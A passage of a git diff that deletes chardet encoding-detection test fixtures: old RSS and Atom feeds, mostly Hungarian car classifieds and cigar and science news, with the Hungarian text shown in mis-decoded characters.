ֳֽ₪״³ֲֽט·ױט¹ױט

    -]]>
    - http://trickspot.boxchart.com/wp-commentsrss2.php?p=52 -
    -
    -
    diff --git a/chardet/tests/ascii/howto.diveintomark.org.xml b/chardet/tests/ascii/howto.diveintomark.org.xml deleted file mode 100644 index 54042d6..0000000 --- a/chardet/tests/ascii/howto.diveintomark.org.xml +++ /dev/null @@ -1,77 +0,0 @@ - -howto.diveintomark.org -1 out of 3 ain't bad -tag:howto.diveintomark.org,2005:0 - - -2005-11-05T05:02:33Z -Copyright 2005, licensed under the Creative Commons Attribution-ShareAlike 2.5 license - -Mark Pilgrim -mark@diveintomark.org -http://diveintomark.org/ - - - <![CDATA[HOWTO Use Your Mac From Anywhere]]> - - tag:howto.diveintomark.org,2005:6 - 2005-11-03T21:28:59Z - 2005-11-03T21:28:59Z - - - - - - - - - - - - - - - - <![CDATA[HOWTO Backup Your DVD Movies]]> - - tag:howto.diveintomark.org,2005:4 - 2005-10-25T13:41:50Z - 2005-10-25T13:41:50Z - - - - - - - - - - - - <![CDATA[HOWTO Put Porn On Your iPod]]> - - tag:howto.diveintomark.org,2005:3 - 2005-10-14T03:41:13Z - 2005-10-14T03:41:13Z - - - - - - - - - <![CDATA[HOWTO Rip DVD Movies To Your iPod Using Free Software]]> - - tag:howto.diveintomark.org,2005:1 - 2005-10-14T02:03:08Z - 2005-10-14T02:03:08Z - - - - - - - - - diff --git a/chardet/tests/iso-8859-2-hungarian/auto-apro.hu.xml b/chardet/tests/iso-8859-2-hungarian/auto-apro.hu.xml deleted file mode 100644 index 5df44e2..0000000 --- a/chardet/tests/iso-8859-2-hungarian/auto-apro.hu.xml +++ /dev/null @@ -1,474 +0,0 @@ - - - - - AUT׃-APR׃.HU - Ingyenes aprףhirdetיsek, תj יs hasznבlt autףk szבmבra! - http://www.auto-apro.hu/ - AUT׃-APR׃.HU - Ingyenes aprףhirdetיsek, תj יs hasznבlt autףk szבmבra! Autף vבsבrlבs, keresיs, hirdetיs, eladבs, dijmentes hirdetיs feladבs magבnszemיlyeknek. - hu - AUT׃-APR׃.HU - Szilard-Erwin Szogyenyi office@auto-apro.hu - Szilard-Erwin Szogyenyi office@auto-apro.hu - - AUT׃-APR׃.HU - Ingyenes aprףhirdetיsek, תj יs hasznבlt autףk szבmבra! - http://www.auto-apro.hu/img/aa/klipfolio_icon.gif - http://www.auto-apro.hu/ - 16 - 16 - AUT׃-APR׃.HU - Ingyenes aprףhirdetיsek, תj יs hasznבlt autףk szבmבra! Autף vבsבrlבs, keresיs, hirdetיs, eladבs, dijmentes hirdetיs feladבs magבnszemיlyeknek. - - - Renault Clio - http://www.auto-apro.hu/hirdetes-megtekintese_891.html - Hirdetיs tipus: Eladף -Kategoria: Renault - Hirdetיs szצvege: Eladף egy &#8217;92-es,1.2-es,3 ajtףs piros renault clio.az elsץ szיlvיdץ repedt,a kיt elsץ sבrvיdץ fekete.j tיli gumival.Mszakilag jף בllapotban van,msz.vizsg. 2007.jan. Kבsa Pבl 06 30 260 80 11 - - - - - El Adף Srgץsen Alkat Rיsznek! - http://www.auto-apro.hu/hirdetes-megtekintese_890.html - Hirdetיs tipus: Eladף -Kategoria: Peugeot - Hirdetיs szצvege: Tצrt בllapot ban van de motorikusan indul pצcre! - - - - - Eladף Egy Vilבgosszrke 1986-os ֹvjבratת Mazda 626 Glx 2.0 - http://www.auto-apro.hu/hirdetes-megtekintese_889.html - Hirdetיs tipus: Eladף -Kategoria: Mazda - Hirdetיs szצvege: Eladף egy vilבgosszrke 1986-os יvjבratת Mazda 626 GLX 2.0. Elektromos ablakok יs tkrצk, szervokormבny, kצzponti zבr. Motorikusan jף בllapotban van. A karosszיriבn kisebb hibבk (tץdיs, karcolבs) talבlhatףak. Futott km: 260.000. Mיg fיl יvig יrvיnyes mszakival. Tovבbbi rיszletek telefonon illetve szemיlyesen. - - - - - Hasznבltautף Hitel Mindenkinek! - http://www.auto-apro.hu/hirdetes-megtekintese_888.html - Hirdetיs tipus: Kצzvetםtek -Kategoria: Szolgבltatבsok - Hirdetיs szצvege: Hasznבltautף hitel magבnszemיlyeknek, cיgelnek, taxisoknak kצnnyen, gyorsan! 5%-os יves kamattףl, akבr 0%-os kezdץ rיszlettel casco-s, casco mentes, CHF, Euro, Forint alapת hitelek BAR listבsoknak is. Ha megszorult, ne adja el autףjבt, vegyen fel rב kedvezץ hitelt!!! A 9 LEGJOBB BANK AJֱNLATA A GARANCIA!! - - - - - Lada2105 - http://www.auto-apro.hu/hirdetes-megtekintese_887.html - Hirdetיs tipus: Eladף -Kategoria: Lada - Hirdetיs szצvege: 1 יv mszakival+zצldkבrtya - - - - - Opel Kadett Gsi 2.0!!! - http://www.auto-apro.hu/hirdetes-megtekintese_886.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: Jף בllapotban lיvץ 89-es metבl szrke Opel Kadett GSI 2.0 eladף! Vonףhorog, hבtsף spoiler, napfיnytetץ, magnף! - - - - - Elsץ Nem Dohבnyzף Tulajdonostףl, Rendszeresen Karbantartott - http://www.auto-apro.hu/hirdetes-megtekintese_885.html - Hirdetיs tipus: Eladף -Kategoria: Lada - Hirdetיs szצvege: Vonףhorog, garבzsban tartott, megkםmיlt, kevיs kilomיterrel. - - - - - Sיrlt Peugeot Srgץsen Eladף! - http://www.auto-apro.hu/hirdetes-megtekintese_882.html - Hirdetיs tipus: Eladף -Kategoria: Peugeot - Hirdetיs szצvege: Rendezett papםrokkal,1,5 יv mszakival.Egיsz eleje totבlkבros,hבtsףrיsze sיrtetlen.Vonףhoroggal. Egyben vagy alkatrיszenkיnt! - - - - - Kצzpontizבr Szett - http://www.auto-apro.hu/hirdetes-megtekintese_884.html - Hirdetיs tipus: Eladף -Kategoria: Egyיb - Hirdetיs szצvege: Univerzבlis kצzpontzבr szett. Mindenbe beszerelhetץ. A berendezיs egy kצzponti elektronikבbףl יs ajtףnkיnt egy mkצdtetץ egysיgbץl בll יs a hozzב tartozף felszerelיsi anyagok (kבbelkorbבcs, vezetיk ek,csavarok,rajz,leםrבs,stb:kי p.)A berendezיshez kapcsolhatףk tבvmkצdtetיs rendszerek is. Teljesen תj! Utבnvיttel is.w ww.kszet. uw. h u - - - - - Elektromos Bץrtetץ + Alkatrיszautף - http://www.auto-apro.hu/hirdetes-megtekintese_883.html - Hirdetיs tipus: Eladף -Kategoria: Mazda - Hirdetיs szצvege: Fekete/szrke megbםzhatף kisautף meglepץen nagy belsץvel, elektromos bץrtetץvel, ajבndיk mkצdץkיpes autףval alkatrיsznek. - - - - - Diesel Smart Eladף - http://www.auto-apro.hu/hirdetes-megtekintese_881.html - Hirdetיs tipus: Eladף -Kategoria: Mercedes - Hirdetיs szצvege: MCC Smart 799 ccm-s, diesel, 2000-es יvjבratת eladף. Iב: 1.570.000.- ft Tel: 06-70-369-9767 - - - - - Kitnץ ֱllapot, Vבltףzבr - http://www.auto-apro.hu/hirdetes-megtekintese_880.html - Hirdetיs tipus: Eladף -Kategoria: Nissan - Hirdetיs szצvege: akבr hitelבtvבllalבsal is megvehetץ, kedvezץ 4%-os konstrukciףban. - - - - - Seat Toledo - http://www.auto-apro.hu/hirdetes-megtekintese_879.html - Hirdetיs tipus: Eladף -Kategoria: Seat - Hirdetיs szצvege: Seat Toledo 98&#8217; alkatrיszek eladףk: klimahtץ, lיgzsבkok, lצkhבrםtף, vבltף, elemek, stb... - -ֱra: 1000 EUR׃ - - - 9 Szemיlyes, Teljesen Felתjםtott, 5 Db Alufelni - http://www.auto-apro.hu/hirdetes-megtekintese_878.html - Hirdetיs tipus: Felajבnlok -Kategoria: Renault - Hirdetיs szצvege: hosszת alvבzת szgk, felתjםtott motor/vבltף/futףm/alvבz, plusz 5 gumi acיlfelnin - - - - - Bץrצn Kםvl Full Extrבs - http://www.auto-apro.hu/hirdetes-megtekintese_877.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: Eladף vagy תjabbra cserיlhetץ - - - - - Garבzsban Tartott Gyבri ֱllapotת, Megkםmיlt, Szבmlבs Kisteherautף - http://www.auto-apro.hu/hirdetes-megtekintese_876.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: Egy garnitתra tיli gumival. Megkםmיlt, gyבri בllapotת, elsץ tulajdonostףl, ֱfבs, garבzsban tartott tzpiros kisteherautף. Mszaki יrvיnyes: 2008. januבr 9-ig. Irבnyבr: 2.050.000,-Ft+ֱfa - - - - - Eladף Szיp ֱllapotban Van - http://www.auto-apro.hu/hirdetes-megtekintese_875.html - Hirdetיs tipus: Eladף -Kategoria: VW - Hirdetיs szצvege: Nem tudok mit mondani rףla,יrdemes יrdeklץldni irבnta. - - - - - Olcso-megbizhato_kisauto_1.0 - http://www.auto-apro.hu/hirdetes-megtekintese_874.html - Hirdetיs tipus: Eladף -Kategoria: Daihatsu - Hirdetיs szצvege: ELAD׃! DAIHATSU CHARADE 1.0 (44 LE) Kifogבstalan mszaki בllapotban, rendszeresen szervizelve. &#8226;mszaki vizsga 2007. novemberig, friss zצldkבrtya &#8226;850-1150 cm3 kצtelezץ kategףria, &#8226;5 fokozatת sebessיgvבltף, &#8226;j fיkbetיtek, tבrcsבk, &#8226;Extrבk: rבdiףsmagnף &#8226;Gyבrtבsi יv: 1984, 5 יve van nבlunk. (Rengeteg pףtalkatrיsz is van!) 06 (20) 423 40 03 - - - - - Peugeot 406 Hdi - http://www.auto-apro.hu/hirdetes-megtekintese_873.html - Hirdetיs tipus: Eladף -Kategoria: Peugeot - Hirdetיs szצvege: Digitבlis klima, fabetיt, 4 lיgzsבk, 4 elektromos ablak, fedיlzeti computer, sיrlיsmentes friss mszaki vizsga.20% bef. hitelre is - - - - - Felתjםtott Motor,felתjםtott Elsץ Futףmvel Jף ֱllapotban Mazda El - http://www.auto-apro.hu/hirdetes-megtekintese_872.html - Hirdetיs tipus: Eladף -Kategoria: Mazda - Hirdetיs szצvege: metבlfיnyezיs, alufelni, בllםthatף kormבny, egyedi lיshuzat, + tיli gumi, cd,mp3 magnף, szםnezett veg, kצzponti zבr, 4 elektromos ablak, elektromos tkrצk, - - - - - Garantבlt,leinformבlhatף Futבsteljesםtmיny!! - http://www.auto-apro.hu/hirdetes-megtekintese_769.html - Hirdetיs tipus: Eladף -Kategoria: Mercedes - Hirdetיs szצvege: Automata klםma, בllםthatף kormבny, centrבlzבr, elektromos ablak, elektromos tkצr, fedיlzeti computer, fthetץ tkצr, immobiliser, szervokormבny, szםnezett veg, dצnthetץ utaslיsek, HIFI, rבdiףsmagnף, lיsmagassבg בllםtבs, vezetץoldali lיgzsבk, utasoldali lיgzsבk, oldal lיgzsבk, hבtsף oldal lיgzsבk, fggצny lיgzsבk, lיgzsבk kikapcsolף, ABS, ASR - - - - - Sok Extra,olcsףbb Csere - http://www.auto-apro.hu/hirdetes-megtekintese_871.html - Hirdetיs tipus: Eladף -Kategoria: Fiat - Hirdetיs szצvege: digit klima,abs,szervo,elצl kיt lיgzsבk + oldal lיgzsבk,kצdfי.,elektromos ablakok elצl,elektr. derיk tבmasz,szםnes veg,בllithatף kormבny יs lיsm.,rבdiףsm.,riasztף,immob.,centrבlz.,rablבsgבtlף,nemdohבnyzף,olcsףbb csere - - - - - ֱfבs ֱr!! - http://www.auto-apro.hu/hirdetes-megtekintese_870.html - Hirdetיs tipus: Eladף -Kategoria: Toyota - Hirdetיs szצvege: Garantבltan 124000 km-t futott, nagyon jף בllapotת mikrobusz, keveset hasznבlt (hetente egyszer). Nagyon megbםzhatף, hibבtlan! Egy-egy garnitתra tיli, יs nyבri gumival, jף fיle magnףs rבdiףval. Szבmlakיpes, tehבt בfבs szבmlבt tudok adni. Teherautףra vizsgבztatva, de 6 szemיly szבllםthatף, tehבt hבtul is van egy lיssor, ami צsszecsukhatף. - - - - - Eladף Egy Jף ֱllapotban Lיvץ Fiat Tipo - http://www.auto-apro.hu/hirdetes-megtekintese_869.html - Hirdetיs tipus: Eladף -Kategoria: Fiat - Hirdetיs szצvege: EXTRֱK:בllithatף kormבny יs lיsmagassבg,fordulatszבmmיrץ,plss,kצnyצklץ,cd-s rבdio,hifi,centrבl zבr,inditבsgבtlף,kצdlבmpa,szines veg. Az בr IRֱNYֱR. - - - - - Fiat Stilo 1,6 16v - http://www.auto-apro.hu/hirdetes-megtekintese_868.html - Hirdetיs tipus: Eladף -Kategoria: Fiat - Hirdetיs szצvege: Rיszletesebben a 06/20-5918383 telefonon. Fedיlzeti computer, dupla automata klםma, oldallיgzsבkok, aut. esץיrzיkelץ, בllםthatף kormבny, el. elsץ ablakok, fthetץ tkrצk, stb. - - - - - Makulבtlan ֱllapot, Folyamatosan Szervizelt, Nem Dohבnyzף! - http://www.auto-apro.hu/hirdetes-megtekintese_653.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: Fףliבzva, rבdiףs magnף, lיsmagassבg בllםtבs, vezetץoldali lיgzsבk, kצdlבmpa, riasztף, tיligumigarnitתra felnivel, gyבri alukerekekkel, ltetve, sportlיgszrץ, sportgyertya, sportkipufogף, friss, 3 hףnapos mszaki יs zצldkבrtya. Frissen szervizelve. Igיny esetיn a kיpen lבthatף 16&quot; alessio felnikkel, תgy 1,03 milliף az irבnyבr. - - - - - Gyבri Alufelnikkel,szםnezett veggel. - http://www.auto-apro.hu/hirdetes-megtekintese_867.html - Hirdetיs tipus: Eladף -Kategoria: Toyota - Hirdetיs szצvege: Vonףhoroggal,Klsץ-belsץ hץmיrץ,fogyasztבsmיrץ,Bevezetett hidegindםtף,hבtsףablakftיs,Fogyasztבsmיrץ,Kצdfיnyszףrףk,Rבdiףs magnףval,ֹs sok tartalיk alkatrיsszel:Difi,Kardבn tengely,Fיltengelyek,rugףk.stb... - - - - - Peugeot 307 ֹp ֹs Enyhיn Sיrlt Gיptetץ Fekete/v.ezst 35-15e - http://www.auto-apro.hu/hirdetes-megtekintese_808.html - Hirdetיs tipus: Eladף -Kategoria: Alkatrיszek - Hirdetיs szצvege: Peu 307 יp יs enyhיn sיrlt gיptetץ fekete/v.ezst 35-15e ft, elsץ hבtsף vיszhבritף+vas 45-30e ft,bal sבrvיdץ 10e,klima יs vizhtץ 22-18e, 2db sיrlt fיnyszףrף 10e, 5.ajtף veggel 35e,hבtsף hid 25e,2db gyבri 16 colos alufelni 3db jף nyבri gumival 50e ,limuin 5 ajtףs tetץ 15e,tיligumi afelnin 195/65R15 semperit dir grip 55e,stb maradek@citromail.hu - - - - - Tranpporte T4 9 Szemיlyes - http://www.auto-apro.hu/hirdetes-megtekintese_866.html - Hirdetיs tipus: Eladף -Kategoria: VW - Hirdetיs szצvege: vilבgos bordף , dםzel, 4 ajtףs, 2. tulajdonostףl, 136,000 km, 2008. februבr-ig יrvיnyes mszaki, 2496 cm3, ABS, 1 db Lיgzsבk, Szervףkormבny, Rבdiףs magnף, VW transporter T 4,2001-es יvjבrat 8+1 szemיlyes,csak szemיlyautףkיnt hasznבlt,szinte gyבri בllapot,garבzsban tartott.Klצn utastיrftיssel. Irבnyבr:3.600.000.-ft ֹrd:06-20-381-02-26 Solt. - - - - - Bmw 520i 24v Friss Mszakival Abs Sibeda Szervף Stb. Jףבllapotban - http://www.auto-apro.hu/hirdetes-megtekintese_865.html - Hirdetיs tipus: Eladף -Kategoria: BMW - Hirdetיs szצvege: Kצzponti zבr motoros ablak elץl gyבri /Bavaria/ rבdio-magnף napfיnytetץ jף mszaki יs esztיtikai בllapot. - - - - - Plss, Szםnezett veg, Friss Mszaki - http://www.auto-apro.hu/hirdetes-megtekintese_864.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: egyeztetיs az alבbbi telefonszבmon - - - - - Plss, Szםnezett veg, Friss Mszaki - http://www.auto-apro.hu/hirdetes-megtekintese_470.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: egyeztetיs:06309745183 - - - - - Ford Escort Srgץsen Eladף! - http://www.auto-apro.hu/hirdetes-megtekintese_863.html - Hirdetיs tipus: Eladף -Kategoria: Ford - Hirdetיs szצvege: alufelnivel(15-צs),spoilerekkel,mszakival. - - - - - Mercedesz Szgki.srgץsen Eladף! - http://www.auto-apro.hu/hirdetes-megtekintese_861.html - Hirdetיs tipus: Eladף -Kategoria: Mercedes - Hirdetיs szצvege: Mszakival,vonףhoroggal,autףmatavבltףval. - - - - - Mazda626 Srgץsen Eladף - http://www.auto-apro.hu/hirdetes-megtekintese_862.html - Hirdetיs tipus: Eladף -Kategoria: Mazda - Hirdetיs szצvege: Kilakatolva,mszaki vizsgבra felkיszםtve,tיli gumikkal,sok elektronikבval. - - - - - A Vםzpumpa Nem Jף, Egyיbkיnt Jף Motorral - http://www.auto-apro.hu/hirdetes-megtekintese_860.html - Hirdetיs tipus: Eladף -Kategoria: Toyota - Hirdetיs szצvege: Korבnak megfelelץ בllapotban,aprף esztיtikai hibבkkal. - - - - - Lada 2105 - http://www.auto-apro.hu/hirdetes-megtekintese_859.html - Hirdetיs tipus: Eladף -Kategoria: Lada - Hirdetיs szצvege: Korבhoz kיpest kitnץ בllapot - - - - - Ford Escort Coupe /1981/ - http://www.auto-apro.hu/hirdetes-megtekintese_858.html - Hirdetיs tipus: Eladף -Kategoria: Ford - Hirdetיs szצvege: Ford Escort Coupe /1981/ hבtsףkerיk maghajtבsת, angol motoros, kצdlבmpבval, rבdiףsmagnףval, pףtalkatrיszekkel, normבl בllapotban srgץsen eladף! - - - - - Eladף 1.0 Swift 1994.12. - http://www.auto-apro.hu/hirdetes-megtekintese_857.html - Hirdetיs tipus: Eladף -Kategoria: Suzuki - Hirdetיs szצvege: Eladף swift jutבnyos בron, megbםzhatף mszaki בllapotban, 11 יvesen. kis motor. - - - - - Nיgykerיkmeghajtבsu Suzuki-subaru - http://www.auto-apro.hu/hirdetes-megtekintese_856.html - Hirdetיs tipus: Eladף -Kategoria: Suzuki - Hirdetיs szצvege: srgצsen eledף - - - - - Iveco Eurocargף - http://www.auto-apro.hu/hirdetes-megtekintese_854.html - Hirdetיs tipus: Eladף -Kategoria: Haszonjבrmvek - Hirdetיs szצvege: Iveco eurocargף fץdarabok egyיb alkatrיszek eladףk,ill.eurocargףt(sיrlt,zemkיptelen,hiבnyos)veszek.tel:06209441132 - - - - - Sיrlt Autף - http://www.auto-apro.hu/hirdetes-megtekintese_853.html - Hirdetיs tipus: Vבsבrolok -Kategoria: Egyיb - Hirdetיs szצvege: Sיrlt,totבlkבros autףt veszek magas בron.tel:06209441132 - - - - - Legend93 - http://www.auto-apro.hu/hirdetes-megtekintese_852.html - Hirdetיs tipus: Eladף -Kategoria: Honda - Hirdetיs szצvege: mszaki 2007-ig. vilבgos bץr belsץvel,automata vבltף, digit klםma, בllםthatף kormבny, centrבlzבr, elektromos ablak, elektromos tkצr, fthetץ tkצr, immobiliser, kצnnyfיm felni, szervokormבny, szםnezett veg, tempomat, dצnthetץ utaslיsek, elektromos tetץ, faberakבs, fthetץ lיs, memףriבs vezetץlיs, lיsmagassבg בllםtבs, vezetץoldali lיgzsבk - - - - - Nagy Vבlasztיk - http://www.auto-apro.hu/hirdetes-megtekintese_851.html - Hirdetיs tipus: Eladף -Kategoria: Daewoo - Hirdetיs szצvege: magyarorszבg legnygyobb hasznבlt matiz kיszlete. gyors יs egyszer hitelgy intיzיs. hasznבlt auto יs mozgבssיrlt utalvבny beszבmitבs. HIVJON BIZALOMMAL. 0670-256-62-47 - - - - - Vizsga 2007.04 - http://www.auto-apro.hu/hirdetes-megtekintese_850.html - Hirdetיs tipus: Eladף -Kategoria: Suzuki - Hirdetיs szצvege: olcsףbb 6 szemיlyes kishaszon, vagy duplaflkיs platףs יrdekel - - - - - zmbentartףi Is Lehetsיges - http://www.auto-apro.hu/hirdetes-megtekintese_849.html - Hirdetיs tipus: Eladף -Kategoria: ARO - Hirdetיs szצvege: 4+1 vadi תj Matador terepgumival, תj ftיsrendszer,-fיkrendszer,-benzinpumpa,friss zצldkבrtya ,vonףhorog - - - - - Seat Leon 1.6 16v B+g - http://www.auto-apro.hu/hirdetes-megtekintese_848.html - Hirdetיs tipus: Eladף -Kategoria: Seat - Hirdetיs szצvege: tekjesen szבmםtףgיp vezיrelt benin+gבz rendszer, garanciבval. - - - - - Kissebb Hibבkkal - http://www.auto-apro.hu/hirdetes-megtekintese_847.html - Hirdetיs tipus: Eladף -Kategoria: Lancia - Hirdetיs szצvege: friss mszaki - - - - - 3 Ajtףs - http://www.auto-apro.hu/hirdetes-megtekintese_846.html - Hirdetיs tipus: Eladף -Kategoria: Opel - Hirdetיs szצvege: mo-i,szervizkצnyves,3.tulaj,szיp בlla potת,rיszletnיl 20%+17/hף 4יvre megoldhatף tel:0620/9565204 - -ֱra: 750000 EUR׃ - - - Peugeot 206 2.0 Hdi - http://www.auto-apro.hu/hirdetes-megtekintese_845.html - Hirdetיs tipus: Eladף -Kategoria: Peugeot - Hirdetיs szצvege: Peugeot 206 2.0 HDI - - - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/cigartower.hu.xml b/chardet/tests/iso-8859-2-hungarian/cigartower.hu.xml deleted file mode 100644 index 37bbac5..0000000 --- a/chardet/tests/iso-8859-2-hungarian/cigartower.hu.xml +++ /dev/null @@ -1,87 +0,0 @@ - - - - - CigarTower - http://www.cigartower.hu/ - Magyarorszבg legnagyobb szivarportבlja. - hu - Copyright (c) 2005, CigarMinds Kft. - 2006. 01. 04. 17:48:45 - 20 - - - A csupasz igazsבg a celofבnrףl - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=321 - Mit kell tenni a szivarokon talבlhatף celofבnnal? Egyבtalבn miיrt takarjבk celofבnnal a szivarokat? Celofבnban tבroljuk ץket vagy anיlkl? Vannak akik mellette בllnak יs vannak akik ellenzik. Megprףbבljuk eloszlatni a klצnbצzץ tיvhiteket. - 2005. 12. 28. 18:51:39 - - - - The Great Habano Factories - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=319 - Megjelent Adriano Martinez Rius legתjabb kצnyve, mely kיpzeletbeli utazבskיnt kצrbevezet bennnket a hםres kubai szivargyבrakban. Megismerhetjk a 16 kivבlasztott szivargyבr mתltjבt יs jelenיt. - 2005. 12. 27. 18:11:29 - - - - Cigar Aficionado, 2005 december - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=320 - Megjelent a Cigar Aficionado 2005 decemberi szבma, a cםmlapon a nemzetkצzi szupersztבrral, a Zorrף Legendבja cםm szupermozi fץszereplץjיvel Antonio Banderassal. - 2005. 12. 24. 15:17:51 - - - - Santa Clara Magnum a Toronyban - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=317 - Az תj Santa Clara szivarok megיrkeztek a CigarTower Kempinskibe. December elejיtץl mבr kaphatףak a szיriבkbףl יrkezett szivarok, melyek mellett klצn emlםtיsre mיltף a guinness rekorder Santa Clara Magnum. - 2005. 12. 17. 10:33:41 - - - - Humidorok a CigarTowerben - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=318 - - 2005. 12. 16. 20:05:46 - - - - Guantanamera szivarok a Toronyban - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=316 - Az egyik legifjabb kubai mבrka, a Guantanamera legismertebb termיkei decembertץl תjra kaphatףk az zletekben. - 2005. 12. 06. 20:55:56 - - - - Big Smoke Weekend 2005 - Las Vegas - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=311 - 10 יve mבr annak, hogy a szivarbarבtok egy csoportja צsszegylt a sivatagi paradicsomban, Las Vegasban, hogy egytt tצltsenek egy hיtvיgיt, mely csak a szivarokrףl szףl. Idיn a Cigar Aficionado 10. alkalommal rendezte meg a szivarbarבtok leghםresebb יs egyben legnagyobb nnepיt, a Big Smoke hיtvיgיt. - 2005. 11. 27. 23:29:52 - - - - Kalmuck szivarok - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=315 - Kalmucknak nevezik az osztrבk Wachau rיgiף bortermelץi a fekete, fehיr יs barna kockבs munkבskabבtot, mely mבra az osztrבk divat egyik meghatבrozף elemיvי vבlt. Ezek a szםnek az alapjai a divatos Tracht-viseletnek. - 2005. 11. 27. 15:04:47 - - - - Kצzיp-kelet Eurףpa dohבnypiaca - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=314 - A cseh Tabakinvest dohבnyipari cיg 600000 darab fצlי szeretnי nצvelni az eladott szivarok szבmבt az orszבg dohבnypiacבn. Ezt Manuel Garcia, a Habanos S.A. alelnצke jelentette be, amikor oktףber vיgיn Prבgבban alבםrta a szerzץdיst a cseh vבllalattal. - 2005. 11. 27. 13:43:53 - - - - j szivarvבgף a Davidofftףl - http://www.cigartower.hu/build.asp?Module=news&ActiveModule=news&ActiveMode=DisplayArticle&ArticleID=312 - A mבr piacon lיvץ termיkek mellett a Davidoff תj szםnekben mutatja be legתjabb szivarvבgףjבt. A termיk szםnei, a palladium יs a fekete lakk bevonat tצkיletes harmףniבban vannak egymבssal. Elegבns, stםlusos יs mindemellett nagyon jףl hasznבlhatף termיk. - 2005. 11. 15. 16:37:30 - - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/escience.hu.xml b/chardet/tests/iso-8859-2-hungarian/escience.hu.xml deleted file mode 100644 index 93aebf1..0000000 --- a/chardet/tests/iso-8859-2-hungarian/escience.hu.xml +++ /dev/null @@ -1,12 +0,0 @@ - - -eScience.huhuhttp://www.escience.huA magyar tudomבnyos kצzיlet hםrei.2006.01.08 : FairPrint 2006, XI. Orszבgos Konferencia יs Kiבllםtבs a szבmםtבstechnika nyomdai alkamazבsבrףlEzתton tבjיkoztatjuk, hogy FairPrint 2006 cםmmel orszבgos konferenciבt szerveznk a szבmםtבstechnika nyomdai alkalmazבsבrףl. A rendezvיnyen felkיrt elץadףk יs szabad elץadבsok rיvיn alkalmat kםvבnunk teremteni ahhoz, hogy a nyomdבsz szakemberek a kezdץtץl a professzionבlis szintig megismerhessיk, a hardver(ek) יs szoftver(ek) hogyan lehetnek segםtsיgkre a mindennapi munka sorבn. Felkיrt fץvיdnצkצk: Magyar Nyomda- יs Papםripari Szakmai Szצvetsיg; -Papםr- יs Nyomdaipari Mszaki Egyeslet.http://www.escience.hu/showitem.php?id=6652006.01.12 : Kandף Konferencia 2006A Budapesti Mszaki Fץiskola Kandף Kבlmבn Villamosmיrnצki Fץiskolai Kara Kandף Kבlmבn emlיkיre megrendezi a XVII. Kandף Konferenciבt. Helyszםn: Budapest, -Tavaszmezץ תt 15-17. A konferencia nyelve: magyar, nיmet, angol. A konferencia tיmakצrei: In memoriam Kandף Kבlmבn; Alkalmazott informatika; Mיrnצki tudomבnyok; Elektronikus mיdia - Mיdiatechnolףgia; Energetika; Mיrיstechnika - Automatika; Oktatבsi irבnyzatok a felsץoktatבsban; Tבvkצzlיstechnika-Infokommunikבciף; Tudomבnykצzi terletek.http://www.escience.hu/showitem.php?id=6672006.01.13 : Pבlyבzat Erasmus Intenzםv Nyelvi Kurzus (EILC) szervezיsיreTempus Kצzalapםtvבny pבlyבzatot hirdet magyar nyelv Erasmus Intenzםv Nyelvi Kurzus magyarorszבgi megszervezיsיre יs kivitelezיsיre. Azok a felsץoktatבsi intיzmיnyek pבlyבzhatnak, amelyek rendelkeznek az Eurףpai Bizottsבg בltal jףvבhagyott Erasmus University Charter-rel. A 2006/2007-es tanיv sorבn az intיzmיnyek az ץszi יs a tavaszi fיlיvet megelץzץen is szervezhetnek nyelvi elץkיszםtץ kurzusokat a klfצldi Erasmus hallgatףk szבmבra. A kurzusoknak legkיsץbb 2007. februבr 28-ig le kell zבrulniuk.http://www.escience.hu/showitem.php?id=6762006.01.15 : ASO Budapest pבlyבzataAz Austrian Science and Research Liaison Office (ASO) pבlyבzatot hirdet Kapcsolatteremtיs tבmogatבsa יs Tartףs egyttmkצdיs tבmogatבsa cםmen. A pבlyבzatok mבr meglיvץ tevיkenysיgek maximבlis צsszehangolבsבval kצzצs tudomבnyos יs kutatבsi hבlףzatok lיtrehozבsבt cיlozzבk meg oda-vissza hatף folyamatok sorבn az osztrבk Bundesministerium fr Bildung Wissenschaft und Kultur megbםzבsבbףl.http://www.escience.hu/showitem.php?id=6222006.01.16 : Nanotechnolףgiai kutatף-laboratףrium MiskolconA Nemzeti Kutatבsi יs Technolףgiai Hivatal 2005. december 12-יn nemzetkצzi pבlyבzatot hirdetett meg nanotechnolףgiai kutatףlaboratףrium felבllםtבsבra a Bay Zoltבn Alkalmazott Kutatבsi Kצzalapםtvבny miskolci telephelyיn. A pבlyבzat cיlja vilבgszםnvonalת nanotechnolףgiai kutatףlaboratףrium lיtrehozבsa יs kutatבs-fejlesztיsi projektek mkצdtetיse a magyar-orosz nanotechnolףgiai egyttmkצdיs magyar rיszיnek megvalףsםtבsa יrdekיben, valamint a nanotechnolףgiai kutatףkיpzיs elץsegםtיse a rיgiףban.http://www.escience.hu/showitem.php?id=6832006.01.18 : Leonardo elץkיszםtץ lבtogatבsok (meghosszabbםtott hatבridץ)A Leonardo da Vinci mobilitבsi pבlyבzatok megםrבsבt segםtץ elץkיszםtץ lבtogatבsokra vonatkozף pבlyבzatok vיgsץ benyתjtבsi hatבrideje meghosszabbםtבsra kerlt 2006 januבrjבig. A 2006-os mobilitבsi pבlyבzatok 2006. februבr 10-i beadבsi hatבrideje elץtti 